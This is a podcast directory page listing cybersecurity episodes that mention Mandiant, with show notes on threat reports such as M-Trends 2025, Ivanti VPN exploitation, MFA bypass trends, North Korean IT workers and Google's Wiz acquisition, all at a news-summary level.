Podcasts about Mandiant

  • 258 podcasts
  • 605 episodes
  • 37m average duration
  • 5 new episodes weekly
  • Latest: May 19, 2025




Latest podcast episodes about Mandiant

Herbert Smith Freehills Podcasts
Cross Examining Cyber EP17: Cross Examining Google Mandiant's Karen Kukoda

May 19, 2025 (33:10)


Karen is a genuine global leader in the cyber-legal space. She manages the relationship between Google Mandiant and its law firm and insurance partners. She has had a remarkable cyber career…think FireEye, Safeguard Cyber, Mandiant and now Google Mandiant! Karen and I caught up at the IAPP Global Conference in Washington D.C. and then again at the RSAC Conference in San Francisco. We recorded this session as some 50,000 cyber experts took over downtown San Francisco. If you want to know more about the interaction between law firms and cyber forensic firms, this podcast is for you. Karen shares her views on the current threat landscape, the role of the cyber-forensic expert, the remarkable rise of the Google Mandiant cyber team and successful engagement with law firms and legal teams. She is a proud Buffalonian and a fierce advocate for women in cyber. This is cross-examining Karen Kukoda. Here we go…

Help Me With HIPAA
Busy Broke and Breached - Ep 508

May 9, 2025 (52:50)


Healthcare still has a giant “Hack Me” sign taped to its back — and the latest reports from Mandiant and Verizon are here to confirm it. These cybercrime breakdowns reveal that attackers are smarter, sneakier, and spending more time poking around your network than ever before. Waiting to secure your systems until after a breach is like installing a smoke detector after the house has already burned down — by the time you smell smoke, it's too late. From dwell times that feel more like extended Airbnb stays to small businesses learning that “we're too small to target” isn't a strategy, the findings hit hard and the lessons come wrapped in some well-placed snark. More info at HelpMeWithHIPAA.com/508

Eye on Security
UNC5221 and The Targeting of Ivanti Connect Secure VPNs

May 5, 2025 (27:55)


Matt Lin (Senior Incident Response Consultant, Mandiant) and Daniel Spicer (Chief Security Officer, Ivanti) dive into the research on and response to UNC5221's campaigns against Ivanti. They cover how this threat actor has evolved from earlier campaigns, the continued focus on edge infrastructure by APT actors, and the shared responsibility of security in mitigating threats like this.

https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability
https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day
https://www.ivanti.com/blog/an-update-on-ivantis-ongoing-commitment-to-enhanced-product-security
https://www.ivanti.com/resources/secure-by-design/2024
https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends?e=48754805

The Cyber Threat Perspective
Episode 132: Reviewing the Mandiant M-Trends 2025 Report

May 2, 2025 (42:23)


In this episode Spencer and Brad review the M-Trends 2025 Report. M-Trends 2025 is Mandiant's annual report that shares frontline learnings from its global incident-response engagements—over 450 000 hours of investigations in 2024—providing sanitized, data-driven analysis of evolving attacker tactics, dwell times, industry and regional trends, and practical recommendations to help organizations improve their defenses.

M-Trends 2025: Data, Insights, and Recommendations From the Frontlines | Google Cloud Blog
Blog: https://offsec.blog/
Youtube: https://www.youtube.com/@cyberthreatpov
Twitter: https://x.com/cyberthreatpov
Spencer's Twitter: https://x.com/techspence
Spencer's LinkedIn: https://linkedin.com/in/SpencerAlessi
Work with Us: https://securit360.com

The CyberWire
AI on the offensive.

May 1, 2025 (33:08)


Updates from RSAC 2025. Former NSA cyber chief Rob Joyce warns that AI is rapidly approaching the ability to develop high-level software exploits. An FBI official warns that China is the top threat to U.S. critical infrastructure. Mandiant and Google raise alarms over widespread infiltration of global companies by North Korean IT workers. France accuses Russia's Fancy Bear of targeting at least a dozen French government and institutional entities. SonicWall has issued an urgent alert about active exploitation of a high-severity vulnerability in its Secure Mobile Access appliances. A China-linked APT group known as “TheWizards” is abusing an IPv6 networking feature. Gremlin Stealer emerges as a serious threat. A 23-year-old Scottish man linked to the Scattered Spider hacking group has been extradited from Spain to the U.S. Senators urge FTC action on consumer neural data. New WordPress malware masquerades as an anti-malware plugin. Our guest is Andy Cao from ProjectDiscovery, the Winner of the 20th Annual RSAC™ Innovation Sandbox Contest. Our intern Kevin returns with some Kevin on the Street interviews from the RSAC floor. Research reveals the risk of juice jacking isn't entirely imaginary.

Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn.

CyberWire Guest
Our guest is Andy Cao from ProjectDiscovery, who is the Winner of the 20th Annual RSAC™ Innovation Sandbox Contest 2025 event.

Kevin on the Street
Joining us this week from RSAC 2025, we have our partner Kevin Magee, Global Director of Cybersecurity Startups at Microsoft for Startups. Stay tuned to the CyberWire Daily podcast for “Kevin on the Street” updates on all things RSAC 2025 from Kevin all week. Today Kevin is joined by Shane Harding, CEO of Devicie, and Nathan Ostrowski, Co-Founder of Petra Security.
You can also catch Kevin on our Microsoft for Startups Spotlight, brought to you by N2K CyberWire and Microsoft, where we shine a light on innovation, ambition, and the tech trailblazers building the future right from the startup trenches. Kevin and Dave talk with startup veteran and Cygenta co-founder FC about making the leap from hacker to entrepreneur, then speak with three Microsoft for Startups members: Matthew Chiodi of Cerby, Travis Howerton of RegScale, and Karl Mattson of Endor Labs. Whether you are building your own startup or just love a good innovation story, listen and learn more here.

Selected Reading
Ex-NSA cyber boss: AI will soon be a great exploit dev (The Register)
AI makes China leading threat to US critical infrastructure, says FBI official (SC World)
North Korean operatives have infiltrated hundreds of Fortune 500 companies (CyberScoop)
France Blames Russia for Cyberattacks on Dozen Entities (SecurityWeek)
SonicWall OS Command Injection Vulnerability Exploited in the Wild (Cyber Security News)
Hackers abuse IPv6 networking feature to hijack software updates (Bleeping Computer)
New Gremlin Stealer Advertised on Hacker Forums Targets Credit Card Data and Login Credentials (GB Hackers)
Alleged ‘Scattered Spider' Member Extradited to U.S. (Krebs on Security)
Senators Urge FTC Action on Consumer Neural Data, Signaling Heightened Scrutiny (Cooley)
New WordPress Malware as Anti-Malware Plugin Take Full Control of Website (Cyber Security News)
iOS and Android juice jacking defenses have been trivial to bypass for years (Ars Technica)

Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices

Hacker And The Fed
Credential Theft, InfoStealers, and the Rise of Cyber Snake Oil

May 1, 2025 (54:24)


Chris and Hector break down the 2025 Mandiant threat report, expose rising cyberattack trends, rant about bad CISOs, and discuss a wild case of a cybersecurity CEO caught installing malware in a hospital. Join our new Patreon! https://www.patreon.com/c/hackerandthefed Send HATF your questions at questions@hackerandthefed.com

Storm⚡️Watch by GreyNoise Intelligence
2025 Cybersecurity Report Breakdown: FBI, Mandiant, GreyNoise, VulnCheck

Apr 29, 2025 (61:44)


Forecast = Scattered phishing attempts with a 90% chance of encrypted clouds.

In this episode of Storm⚡️Watch, the crew dissects the evolving vulnerability tracking landscape and the challenges facing defenders as they move beyond the aging CVE system. The show also highlights the rise of sophisticated bot traffic, the expansion of GreyNoise's Global Observation Grid, and fresh tools from VulnCheck and Censys that are helping security teams stay ahead of real-time threats.

In our listener poll this week, we ask: what would you do if you found a USB stick? It's a classic scenario that always sparks debate about curiosity versus caution in cybersecurity.

It's officially cyber report season, and we're breaking down the latest findings from some of the industry's most influential threat intelligence teams. GreyNoise's new research spotlights the growing risk from resurgent vulnerabilities: those old flaws that go quiet for years before suddenly making a comeback, often targeting edge devices like routers and VPNs. The FBI's 2024 IC3 report is out, revealing a record $16.6 billion in reported losses last year, with phishing, extortion, and business email compromise topping the charts. Mandiant's M-Trends 2025, VulnCheck's Q1 exploitation trends, and other reports all point to a relentless pace of vulnerability weaponization, with nearly a third of new CVEs being exploited within 24 hours of disclosure.

We also dig into a series of ace blog posts and research from Censys, including their push to end stale indicators and their deep dives into the sharp rise in attacks targeting edge security devices. Their recent work with GreyNoise and CursorAI on botnet hunting, as well as their new threat hunting module, are changing the game for proactive defense. VulnCheck's quarterly report is raising eyebrows with the revelation that 159 vulnerabilities were exploited in Q1 2025 alone, and 28% of those were weaponized within a single day of disclosure. This underscores how quickly attackers are operationalizing new exploits and why defenders need to move faster than ever.

We round out the show with the latest from runZero and a look at GreyNoise's recent findings, including a ninefold surge in Ivanti Connect Secure scanning and a spike in Git configuration crawling, both of which highlight the ongoing risk of codebase exposure and the need for continuous vigilance.

Cloud Security Podcast by Google
EP222 From Post-IR Lessons to Proactive Security: Deconstructing Mandiant M-Trends

Apr 28, 2025 (35:19)


Guests: Kirstie Failey @ Google Threat Intelligence Group; Scott Runnels @ Mandiant Incident Response

Topics:
What is the hardest thing about turning distinct incident reports into a fun-to-read and useful report like M-Trends?
How much are the lessons and recommendations skewed by the fact that they are all “post-IR” stories? Are “IR-derived” security lessons the best way to improve security? Isn't this a bit like learning how to build safely from fires vs learning safety engineering?
The report implies that F500 companies suffer from certain security issues despite their resources; does this automatically mean that smaller companies suffer from the same, but more?
"Dwell time" metrics sound obvious, but is there magic behind how this is done? Sometimes “dwell time going down” is not automatically the defender's win, right? What is the expected minimum dwell time? If “it depends”, then what does it depend on?
Impactful outliers vs general trends (“by the numbers”): what teaches us more about security?
Why do we seem to repeat the mistakes so much in security? Do we think it is useful to give the same advice repeatedly if the data implies that it is correct advice but people clearly do not do it?

Resources:
M-Trends 2025 report
Mandiant Attack Lifecycle
EP205 Cybersecurity Forecast 2025: Beyond the Hype and into the Reality
EP147 Special: 2024 Security Forecast Report

The CyberWire
Lessons from the latest breach reports.

Apr 24, 2025 (28:57)


Verizon and Mandiant call for layered defenses against evolving threats. Cisco Talos describes ToyMaker and Cactus threat actors. Researchers discover a major Linux security flaw which allows rootkits to bypass traditional detection methods. Ransomware groups are experimenting with new business models. Deputy Assistant Director Cynthia Kaiser from the FBI Cyber Division shares the latest on Salt Typhoon. Global censorship takes a coffee break.

CyberWire Guest
Dave sits down with Deputy Assistant Director Cynthia Kaiser from the FBI Cyber Division, who shares a PSA on Salt Typhoon.

Selected Reading
2025 Data Breach Investigations Report (Verizon)
Mandiant M-Trends 2025 Report (Mandiant)
Introducing ToyMaker, an initial access broker working in cahoots with double extortion gangs (Cisco Talos)
Linux 'io_uring' security blindspot allows stealthy rootkit attacks (bleepingcomputer)
Ransomware groups test new business models to hit more victims, increase profits (the record)
Cloudflare: Government-backed internet shutdowns plummet to zero in first quarter (the record)

Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show.

Cyber Morning Call
769 - Mandiant and Verizon release their annual reports

Apr 24, 2025 (11:39)


Episode references:
M-Trends 2025: Data, Insights, and Recommendations From the Frontlines
2025 Data Breach Investigations Report
Distribution of PebbleDash Malware in March 2025
Operation SyncHole: Lazarus APT goes back to the well
Russian Infrastructure Plays Crucial Role in North Korean Cybercrime Operations
LACNIC 43
BsidesSP

Script and presentation: Carlos Cabral and Bianca Oliveira
Audio editing: Paulo Arruzzo
Closing narration: Bianca Garcia

Cloud Security Podcast by Google
EP219 Beyond the Buzzwords: Decoding Cyber Risk and Threat Actors in Asia Pacific

Apr 14, 2025 (31:46)


Guest: Steve Ledzian, APAC CTO, Mandiant at Google Cloud

Topics:
We've seen a shift in how boards engage with cybersecurity. From your perspective, what's the most significant misconception boards still hold about cyber risk, particularly in the Asia Pacific region, and how has that impacted their decision-making?
Cybersecurity is rife with jargon. If you could eliminate or redefine one overused term, which would it be and why? How does this overloaded language specifically hinder effective communication and action in the region?
The Mandiant Attack Lifecycle is a well-known model. How has your experience in the East Asia region challenged or refined this model? Are there unique attack patterns or actor behaviors that necessitate adjustments?
Two years post-acquisition, what's been the most surprising or unexpected benefit of the Google-Mandiant combination?
M-Trends data provides valuable insights, particularly regarding dwell time. Considering the Asia Pacific region, what are the most significant factors reducing dwell time, and how do these trends differ from global averages?
Given your expertise in Asia Pacific, can you share an observation about a threat actor's behavior that is often overlooked in broader cybersecurity discussions?
Looking ahead, what's the single biggest cybersecurity challenge you foresee for organizations in the Asia Pacific region over the next five years, and what proactive steps should they be taking now to prepare?

Resources:
EP177 Cloud Incident Confessions: Top 5 Mistakes Leading to Breaches from Mandiant
EP156 Living Off the Land and Attacking Critical Infrastructure: Mandiant Incident Deep Dive
EP191 Why Aren't More Defenders Winning? Defender's Advantage and How to Gain it!

Moor Insights & Strategy Podcast
The Enterprise Apps Podcast, Ep 6: Adobe Summit, Supply Chain Volatility, Google/Wiz, Oracle Agents, and More

Apr 10, 2025 (26:33)


In Episode 6 of The Enterprise App Podcast, Robert Kramer and Melody Brue dive into transformative trends in enterprise technology. From groundbreaking AI advancements in marketing to supply chain modernization and a closer look at major industry acquisitions, this episode is packed with insights on navigating today's rapidly evolving digital landscape.

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, Apr 4th: URL Frequency Analysis; Ivanti Flaw Exploited; WinRAR MotW Vuln; Tax filing scams; Oracle Breach Update

Apr 4, 2025 (6:16)


Exploring Statistical Measures to Predict URLs as Legitimate or Intrusive
Using frequency analysis, and training the model with honeypot data as well as log data from legitimate websites, allows for a fairly simple and reliable triage of web server logs to identify possible malicious activity.
https://isc.sans.edu/diary/Exploring%20Statistical%20Measures%20to%20Predict%20URLs%20as%20Legitimate%20or%20Intrusive%20%5BGuest%20Diary%5D/31822

Critical Unexploitable Ivanti Vulnerability Exploited CVE-2025-22457
In February, Ivanti patched CVE-2025-22457. At the time, the vulnerability was not considered to be exploitable. Mandiant has now published a blog disclosing that the vulnerability was exploited as early as mid-March.
https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/

WinRAR MotW Vulnerability CVE-2025-31334
WinRAR patched a vulnerability that would not apply the Mark of the Web correctly if a compressed file included symlinks. This may make it easier to trick a victim into executing code downloaded from a website.
https://nvd.nist.gov/vuln/detail/CVE-2025-31334

Microsoft Warns of Tax-Related Scam
With the US personal income tax filing deadline only about a week out, Microsoft warns of commonly deployed scams that they are observing related to income tax filings.
https://www.microsoft.com/en-us/security/blog/2025/04/03/threat-actors-leverage-tax-season-to-deploy-tax-themed-phishing-campaigns/

Oracle Breach Update
https://www.bloomberg.com/news/articles/2025-04-02/oracle-tells-clients-of-second-recent-hack-log-in-data-stolen

Security Conversations
NSA director fired, Ivanti's 0day screw-up, backdoor in robot dogs

Apr 4, 2025 (96:57)


Three Buddy Problem - Episode 41: Costin and Juanito join the show from Black Hat Asia in Singapore. We discuss Bunnie Huang's keynote on hardware supply chains and a classification system to establish a grounded perspective on trust in hardware, Ivanti's misdiagnosis of a critical VPN appliance flaw and Mandiant reporting on a Chinese APT exploiting Ivanti devices. Plus, breaking news on the sudden firing of the NSA director and head of Cyber Command, Tim Haugh. We also discuss Microsoft touting AI's value in finding open-source bootloader bugs, a Silent Push report on a Russian APT impersonating the CIA, a backdoor in a popular Chinese robot dog, and Chinese dominance of the robotics market. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

Relating to DevSecOps
Episode #077: Is Google Eating the Cloud?

Mar 24, 2025 (31:59)


In this episode of Relating to DevSecOps, Ken Toler and Mike McCabe dive deep into Google's blockbuster acquisition of Wiz.io for a reported $32 billion. They explore the implications for cloud security, the consolidation of the DevSecOps tooling landscape, and how this move compares to Google's previous acquisitions like Mandiant and Chronicle. The duo debates the future of multi-cloud strategies, platform fatigue, and whether Wiz will remain the darling of the security community—or get lost in the labyrinth of Google Cloud products. With sharp insights and a dash of hot takes, they paint a picture of a cloud security ecosystem at a pivotal turning point.

Techzine Talks
Google Cloud goes for multi-cloud security with Wiz acquisition

Mar 24, 2025 (23:44)


Alphabet (Google's parent company) made the largest acquisition in the company's history last week. It is prepared to pay no less than 32 billion dollars for the young and relatively small Wiz. Cloud security is hot, that much is clear. But is it also a sensible acquisition? We discuss it in this episode of Techzine Talks.

Last year Alphabet was already in the market for Wiz, but at that time the founders and owners of the Israeli cloud-security company did not consider 23 billion enough. That in itself is remarkable, because Wiz's revenue was and is not that high in absolute terms. The company expects to reach an ARR (Annual Recurring Revenue) of 1 billion dollars in the course of this year. That is certainly very impressive given Wiz's young age (5 years old), but an acquisition bid of 23 and now 32 billion dollars looks very steep at first glance.

Wiz is, however, quite a special company, which has worked its way onto the top lists in the CNAPP (Cloud-Native Application Protection Platform) world in a very short time. It has done so mainly with the Cloud Security Posture Management (CSPM) part of its offering. Whoever you talk to or whatever you read about it, that part is said to be really very good. In any case, it has been the main reason for the rapid rise. By now there are, alongside Wiz Cloud, also Wiz Code and Wiz Defend. These components focus on code security and on detection and response, respectively.

What does Alphabet (Google) want with Wiz?
The most important question is of course what Google Cloud Platform (GCP) plans to do with Wiz. Does it want to integrate Wiz fully into GCP and offer it as a unique part of the Google public cloud? Or will it let Wiz operate more or less independently and thereby go for multi-cloud security? The latter has always been Wiz's goal. It would be unfortunate for Wiz's customers if this were to change now.

In any case, the acquisition of Wiz makes GCP's security offering considerably more complete. With Chronicle and Mandiant there was already SIEM, threat intelligence and incident response; now cloud security is added.

Weren't Alphabet and Google supposed to be getting smaller?
At 32 billion, the acquisition of Wiz is, as already noted, by far the largest ever for Alphabet. Before this, it was the 12.5 billion it paid for Motorola. Let us at least hope, for Wiz's customers, that this acquisition ends better than the Motorola one. Google made a bit of a mess of that. It sold that division on to Lenovo fairly quickly at a hefty loss. Besides being a very large acquisition, it is also quite a peculiar one in our view. Google is under considerable fire in other areas because of its dominance. There are voices saying Google must sell off the Chrome division, and things are not going smoothly between the EU and Google either, particularly around Search. So it is rather remarkable that another part of the same company is making an enormous acquisition. Listen to Techzine Talks to find out everything about this mega-acquisition, what it means for Google Cloud, the market and the customers who are in the market for cloud security.

Security Conversations
A half-dozen Microsoft zero-days, Juniper router backdoors, advanced bootkit hunting

Mar 14, 2025 (125:43)


Three Buddy Problem - Episode 38: On the show this week, we look at a hefty batch of Microsoft zero-days exploited in the wild, iOS 18.3.2 fixing an exploited WebKit bug, a mysterious Unpatched.ai being credited with Microsoft Access RCE flaws, and OpenAI lobbying for the US to ban China's DeepSeek. Plus, discussion of a Binarly technical paper with a new approach to finding UEFI bootkits, Mandiant flagging custom backdoors on Juniper routers, and MEV 'sandwich attacks' front-running cryptocurrency transactions. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

Security Breach
Manufacturing's Internal Cyber Struggles

Mar 13, 2025 (27:48)


Breaking down silos while securing the cloud and leveraging secure-by-design advancements.

The challenges facing the industrial OT landscape that emanate from external sources are … varied, complex and constantly evolving. Smarter hacking groups, AI-driven phishing schemes and deceptive malware head the list of concerns. And while these factors show no signs of fading, the reality is that there are just as many challenges facing industrial cybersecurity that are embedded within the very foundation of our operations. These legacy dynamics have created internal battles that absorb valuable resources, waste precious talent and help the bad guys stay a step ahead.

With this in mind, we're going to tap into two key industry leaders to get their take on pressing internal liabilities that are ensuring key production assets remain exposed. We'll hear from Silverfort's Rob Larsen, as he discusses the ongoing struggles created by IT/OT silos, as well as secure-by-design initiatives. Mandiant's Paul Shaver will also offer his take on these silos, and how decisions related to cloud networking are impacting the security posture of key data, assets and network connections.

To catch up on past episodes, you can go to Manufacturing.net, IEN.com or MBTmag.com. You can also check Security Breach out wherever you get your podcasts, including Apple, Amazon and Overcast. If you have a cybersecurity story or topic that you'd like to have us explore on Security Breach, you can reach me at jeff@ien.com.
To download our latest report on industrial cybersecurity, The Industrial Sector's New Battlefield, click here.

The IT Pro Podcast
The new era of cyber threats

Feb 21, 2025 (42:58)


The cybersecurity landscape gets more complicated every year, with emerging technologies such as AI and the shifting geopolitical landscape bringing extra chaos to any CISO's desk. Though automated defense systems are a welcome feather in the cap for any company, it's not just the good guys who have access to the latest tools. Off-the-shelf frameworks to launch attacks are becoming more common, and businesses can't rely on any single service to be a silver bullet. What are the individual forces at play here? And how can security teams keep up?

In this episode, Rory speaks with Kevin Mandia, founder and former CEO at Mandiant and current board member at cybersecurity firm Expel, and Dave ‘Merk' Merkel, co-founder and CEO at Expel, to learn more about the current global cybersecurity landscape and what the future holds for security teams.

Read more:
State-sponsored cyber attacks: The new frontier
The new ransomware groups worrying security researchers in 2025
Stopping cyber attackers from targeting the weakest links in security
Stealthy malware: The threats hiding in plain sight
Why attacks against critical national infrastructure (CNI) are such a threat – and how governments are responding
Why vendor breaches still haunt enterprise IT leaders
London council claims it faces 20,000 cyber attacks per day
I love magic links – why aren't more services using them?
How to create a secure password policy
Majority of firms using generative AI experience related security incidents – even as it empowers security teams

Security Conversations
Inside the DeepSeek AI existential crisis, Chinese 'backdoor' in medical devices

Jan 31, 2025 (139:44)


Three Buddy Problem - Episode 32: In this episode, we rummage through the DeepSeek hype and break down what makes it different from OpenAI's models, why it's stirring up existential controversies, and what it means for the broader tech landscape. We get into the privacy concerns, the geo-political implications, how AI models handle data, the ongoing debate over IP theft and innovation, and the challenges that come with a Chinese company shipping an open-source alternative. Beyond AI, we dig into some of the latest headlines: a Chinese ‘backdoor' in medical devices, problems with CISA's backdoor bulletin, the risks of insecure IoT, phishing attacks on influencers, and ongoing battles over censorship in the VPN space. We also touch on WhatsApp catching spyware vendor Paragon Solutions and potential shifts in U.S. government policy on commercial mercenary hacking and surveillance companies. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

Security Conversations
Hijacking .gov backdoors, Ivanti 0days and a Samsung 0-click vuln

Jan 10, 2025 (108:21)


Three Buddy Problem - Episode 29: Another day, another Ivanti zero-day being exploited in the wild. Plus, China's strange response to Volt Typhoon attribution, Japan blames China for hacks, a Samsung 0-click vulnerability found by Project Zero, Kim Zetter's reporting on drone sightings and a nuclear scare. Plus, hijacking abandoned .gov backdoors and Ukrainian hacktivists wiping a major Russian ISP. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Costin Raiu (https://twitter.com/craiu) and Ryan Naraine (https://twitter.com/ryanaraine).

The CyberWire
Router security in jeopardy.

Dec 9, 2024 (33:57)


A critical zero-day is confirmed by a Japanese router maker. Romania annuls the first round of its 2024 presidential election over concerns of Russian interference. A sophisticated malware campaign targets macOS users. Mandiant uncovers a method to bypass browser isolation using QR codes. Belgian and Dutch authorities arrest eight individuals linked to online fraud schemes. A medical device company discloses a ransomware attack. A community hospital in Massachusetts confirms a ransomware attack affecting over three hundred thousand. The Termite ransomware gang claims responsibility for the attack on Blue Yonder. Synology patches multiple vulnerabilities in its Router Manager (SRM) software. The head of U.S. Cyber Command outlines the challenges of keeping decision makers up to date. Our guest is Anna Pobletts, Head of Passwordless at 1Password, discussing the state of passkeys and what she sees on the road to a truly passwordless future. Robot rats join the mischief.

CyberWire Guest
Our guest is Anna Pobletts, Head of Passwordless at 1Password, discussing the state of passkeys and what she sees on the road to a truly passwordless future.

Selected Reading
I-O Data Confirms Zero-Day Attacks on Routers, Full Patches Pending (SecurityWeek)
Romania's top court annuls presidential election result (CNN)
MacOS Passwords Alert—New Malware Targets Keychain, Chrome, Brave, Opera (Forbes)
QR codes bypass browser isolation for malicious C2 communication (Bleeping Computer)
Eight Suspected Phishers Arrested in Belgium, Netherlands (SecurityWeek)
Medical Device Maker Artivion Scrambling to Restore Systems After Ransomware Attack (SecurityWeek)
Anna Jaques Hospital ransomware breach exposed data of 300K patients (Bleeping Computer)
Blue Yonder SaaS giant breached by Termite ransomware gang (Bleeping Computer)
Synology Router Vulnerabilities Let Attackers Inject Arbitrary Web Script (Cyber Security News)
Cyber Command Chief Discusses Challenges of Getting Intel to Users (Defense.gov)
Robot Rodents: How AI Learned To Squeak And Play (Hackaday)

@BEERISAC: CPS/ICS Security Podcast Playlist
Enhancing OT Cybersecurity: From Legacy Systems to Cloud Solutions with Paul Shaver

@BEERISAC: CPS/ICS Security Podcast Playlist

Play Episode Listen Later Nov 19, 2024 57:11


Podcast: PrOTect It All
Episode: Enhancing OT Cybersecurity: From Legacy Systems to Cloud Solutions with Paul Shaver
Pub date: 2024-11-18

In this episode, Aaron is joined by Paul Shaver, an experienced OT security consultant from Mandiant, part of Google Cloud. Together, they navigate the nuanced landscape of operational technology (OT) cybersecurity.

The episode begins with Aaron recalling a critical incident at a power plant that underscores the potential pitfalls in OT environments. This sets the stage for a rich discussion on the evolution of OT technology, with Aaron and Paul reminiscing about primary domain controllers and early NT workstations.

The conversation shifts to the future of OT in the cloud, where Paul highlights the benefits of cloud solutions, including enhanced resiliency, security, and data optimization through AI. A compelling customer case study illustrates modern technology adoption with web-based HMIs and Chromeboxes.

Paul offers a detailed analysis of the current OT cybersecurity landscape, addressing the persistent legacy system challenges and the need for a cohesive IT-OT security strategy. He discusses the evolving threat landscape influenced by global geopolitical tensions and the rise of zero-day vulnerabilities.

Listeners will gain practical insights into foundational cybersecurity measures, such as network segmentation, asset inventory management, and robust access control.

Key Moments:
04:14 Connecting IT and OT optimizes processes securely.
09:54 Lost production severely impacts manufacturing revenue recovery.
14:06 Ensure network notifications; control access, separate credentials.
17:10 Engineers need secure access to adjust parameters.
21:55 Endpoint detection on older systems is critical.
28:47 Resilience is crucial in CrowdStrike incident response effectiveness.
32:11 Limited resources for global incident response efforts.
39:22 Rebuilt domain controller caused authentication issues.
42:37 Focus on resiliency and cloud opportunities, leveraging multi-cloud.
44:59 Improve grid operations using cloud and hyper-converged technology.
48:38 Local cloud provides redundancy for remote sites.
51:15 Critical for acquisition process and problem-solving.

About the guest:
Paul Shaver has dedicated more than two decades to various roles in Operational Technology (OT), primarily within the oil and gas industry. His expertise spans OT architecture, design, and build, along with run and maintain responsibilities as an asset owner. Before transitioning into cybersecurity, Paul served as a Technology Director for an oil and gas company in California. Driven by a burgeoning interest in security, he joined Mandiant nearly five years ago. At Mandiant, now part of Google, Paul relishes the mission of enhancing security postures in OT and critical infrastructure, contributing to significant advancements in the field.

How to connect with Paul: https://www.linkedin.com/in/pbshaver/

Connect With Aaron Crow:
Website: www.corvosec.com
LinkedIn: https://www.linkedin.com/in/aaronccrow

Learn more about PrOTect IT All:
Email: info@protectitall.co
Website: https://protectitall.co/
X: https://twitter.com/protectitall
YouTube: https://www.youtube.com/@PrOTectITAll
Facebook: https://facebook.com/protectitallpodcast

To be a guest or suggest a guest/episode, please email us at info@protectitall.co

The Cybersecurity Defenders Podcast
#159 - Intel Chat: Sequoia disruption, Github, Supershell, DPRK & Telegram arrest

The Cybersecurity Defenders Podcast

Play Episode Listen Later Sep 30, 2024 38:54


In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.

Apple's release of macOS 15, or Sequoia, has caused significant disruptions for several security tools and software vendors, including CrowdStrike, SentinelOne, Microsoft, and others.

Attackers are exploiting GitHub notifications for phishing by sending legitimate-looking alerts with malicious URLs.

Truffle Security's research exposes a significant issue in GitHub's handling of deleted and private repository data via Cross Fork Object Reference (CFOR).

AhnLab's report details Supershell, a malware targeting Linux SSH servers via brute-force attacks.

Since 2022, Mandiant has tracked DPRK IT workers infiltrating global organizations by posing as non-North Koreans to fund the regime's weapons programs and evade sanctions.

In August 2024, Telegram CEO Pavel Durov was arrested in France, facing charges for allowing criminal activities to proliferate on the platform, including the distribution of illegal content such as child sexual abuse material.

Eye on Security
How Threat Actors Bypass Multi-Factor Authentication

Eye on Security

Play Episode Listen Later Sep 26, 2024 27:20


Josh Fleischer, Principal Security Analyst with Mandiant's Managed Defense organization, sits down with host Luke McNamara to discuss trends in MFA bypass and how threat actors are conducting adversary-in-the-middle (AiTM) attacks to gain access to targeted organizations. Josh walks through a case study of MFA bypass, how token theft occurs, the increasing amount of AiTM activity as more features are added to phishing kits, and more.

Cloud Security Podcast by Google
EP191 Why Aren't More Defenders Winning? Defender's Advantage and How to Gain it!

Cloud Security Podcast by Google

Play Episode Listen Later Sep 23, 2024 23:36


Guest: Dan Nutting, Manager - Cyber Defense, Google Cloud

Topics:
What is the Defender's Advantage and why did Mandiant decide to put this out there?
This is the second edition. What is different about DA-II?
Why do so few defenders actually realize their Defender's Advantage?
The book talks about the importance of being "intelligence-led" in cyber defense. Can you elaborate on what this means and how organizations can practically implement this approach?
Detection engineering is presented as a continuous cycle of adaptation. How can organizations ensure their detection capabilities remain effective and avoid fatigue in their SOC?
Many organizations don't seem to want to make detections at all, what do we tell them?
What is this thing called "Mission Control"? It sounds really cool, can you explain it?

Resources:
Defender's Advantage book
The Defender's Advantage: Using Artificial Intelligence in Cyber Defense supplemental paper
"Threat-informed Defense Is Hard, So We Are Still Not Doing It!" blog
Mandiant blog

Cloud Wars Live with Bob Evans
How Google Cloud Leverages AI and Partner Ecosystem to Deliver Advanced Security Offerings | Cloud Wars Live

Cloud Wars Live with Bob Evans

Play Episode Listen Later Sep 19, 2024 26:32


Google Cloud AI Security Insights

The Big Themes:

Google's ecosystem-driven security approach: Google Cloud's partner ecosystem, consisting of entities such as managed security service providers (MSSPs) and global systems integrators, helps deliver top-notch security services. While Google maintains a small in-house service capability, partners are key to scaling and extending innovations to customers. Google provides AI tools to partners, who enhance their product offerings to better serve end customers. This model ensures that the latest security advancements, such as AI integration, are accessible.

Transitioning from assisted to autonomous security: Google Cloud envisions a future where AI will evolve from assistive to fully autonomous security workflows. Currently, AI plays an assistive role by providing actionable insights to security teams, helping them prioritize threats and respond more effectively. However, the goal is to transition these capabilities into semi-autonomous workflows, with the potential for fully autonomous security systems in the future.

Enhancing CISOs' efficiency with AI: One of the key problems CISOs face today is the overwhelming number of security alerts, which makes it challenging to identify and act on the most critical threats. Google Cloud addresses this issue by leveraging AI to sift through thousands of alerts, helping CISOs quickly identify the most significant risks. AI can provide real-time insights, suggesting actions to mitigate potential threats and reduce the noise from less pressing alerts.

